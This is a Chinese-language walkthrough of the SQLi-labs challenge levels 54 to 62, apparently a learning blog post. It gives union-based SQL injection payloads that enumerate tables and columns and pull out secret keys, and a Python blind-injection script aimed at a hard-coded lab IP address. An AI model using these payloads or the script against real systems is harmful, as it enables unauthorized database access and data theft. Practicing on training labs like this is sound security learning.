SQLi-labs Challenges
Less 54
Description: GET / challenge / Union / 10 queries allowed / Variation 1
要求从challenges数据库中获取secret_key,限制了查询次数为10。
#1.判断闭合方式 -> 单引号闭合
id=1' or '1'='1
#2.获取表名 -> PSYFDRBQFS
union select 1,group_concat(table_name),3 from information_schema.tables \
where table_schema='challenges'#
#3.获取字段名 -> id,sessid,secret_HOGR,tryy
union select 1,group_concat(column_name),3 from information_schema.columns \
where table_name='PSYFDRBQFS'#
#4.获取secret字段 -> YsqNLf4769SUGQm7HDdyNjRP
union select 1,group_concat(secret_HOGR),3 from PSYFDRBQFS#
Less 55
Description: GET / challenge / Union / 14 queries allowed / Variation 2
1.判断闭合方式
id=1' --+
id=1" --+
id=1 --+
id=1) --+ //correct
id=1') --+
id=1") --+
2.常规查询
#1.table_name -> A8OVY3542N
-1) union select 1,group_concat(table_name),3 from information_schema.tables \
where table_schema='challenges'--+
#2.column_name -> secret_XXQ0
-1) union select 1,group_concat(column_name),3 from information_schema.columns \
where table_name='A8OVY3542N'--+
# secret_key -> tDKqoseQXitElBSv7SsW3XLv
-1) union select 1,group_concat(secret_XXQ0),3 from A8OVY3542N--+
Less 56-61基本上都是闭合方式上的区别,常见的闭合方式有'、"、)、')、")、'))等。
Less 62
Description: GET / challenge / Blind / 130 queries allowed / variation 1
经探测闭合方式为单引号'),限制查询次数为130的盲注,这里使用二分法进行注入。(130次不够,逃~
# -*- coding: utf-8 -*-
import time
import requests
from urllib.parse import quote_plus
main_url = 'http://43.247.91.228:84/Less-62/?id='
correct = 'Your Login name : Angelina'
# payload
table_name_ = '1\') and ascii(substr((select group_concat(table_name) '\
'from information_schema.tables where table_schema=\'challenges\'),%d,1))%s%d#'
def check(query_string):
url = main_url + quote_plus(query_string)
html = requests.get(url)
if correct in html.text:
return True
else:
return False
def search(payload):
print('[*]' + payload)
result = ''
print('[~]', end = '')
for i in range(1, 100):
left = 33
right = 127
#binary search
while left <= right:
mid = (left + right) // 2
s = payload % (i, '=', mid)
if check(s):
result += chr(mid)
print(chr(mid), end = '')
break
else:
s = payload % (i, '>', mid)
if check(s):
left = mid + 1
else:
right = mid - 1
if left > right:
break
print()
return result
if __name__=="__main__":
table_name = search(table_name_)
剩余关卡主要区别也就在于闭合方式的不同,不多赘述,整体把SQLi-labs刷下来感觉没有预期的那么难,很关卡也只是同种类型做了微小的改变(如闭合方式),都是一些基础题目,适合新手入门学习~